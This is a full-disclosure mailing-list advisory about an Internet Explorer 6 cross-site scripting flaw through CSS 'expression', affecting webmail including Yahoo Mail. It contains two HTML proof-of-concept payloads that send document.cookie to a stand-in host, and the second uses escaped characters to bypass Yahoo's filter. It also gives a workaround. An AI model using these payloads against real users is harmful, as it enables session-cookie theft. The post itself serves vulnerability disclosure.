[Bugdev] [Full-Disclosure] Webmails (including Yahoo) + IE 6 = XSS

[Jedi/Sector One <[EMAIL PROTECTED]>]

  Internet Explorer has an useless feature that allows evaluation of
Javascript expressions in style sheets through the "expression" keyword.

  It allows execution of arbitrary javascript as soon as an HTML message is
read in older versions of Outlook and in most webmail systems filtering
<script> tags :

<html>
<body>
<style type="text/css">
h1 {
  height:expression(alert(42));
  background-image:expression('url(http://example.org/'+document.cookie+')');
}
</style>
<h1>...</h1>
</body>
</html>

  Yahoo! mail has a filter against this, that replaces "expression" with
"_expression".

  Unfortunately, this filter is easy to bypass using escaped characters that
are valid CSS and that are properly handled by IE 6.

<html>
<body>
<style type="text/css">
h1 {
  he\ight:e\xpression(alert(42));
  bac\kground-image:e\xpression('url(http://example.org/'+document.cookie+')');
}
</style>
<h1>...</h1>
</body>
</html>

  Workaround until all existing webmail software is fixed (...) : disable
Javascript and/or use any other web browser that focuses on W3C compliance
instead of implementing insecure bloat.

-- 
 __  /*-      Frank DENIS (Jedi/Sector One) <[EMAIL PROTECTED]>     -*\  __
 \ '/    <a href="http://www.PureFTPd.Org/";> Secure FTP Server </a>    \' /
  \/  <a href="http://www.Jedi.Claranet.Fr/";> Misc. free software </a>  \/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Bugdev mailing list
[EMAIL PROTECTED]
http://bugdev.avet.com.pl/
http://www.avet.com.pl/mailman/listinfo/bugdev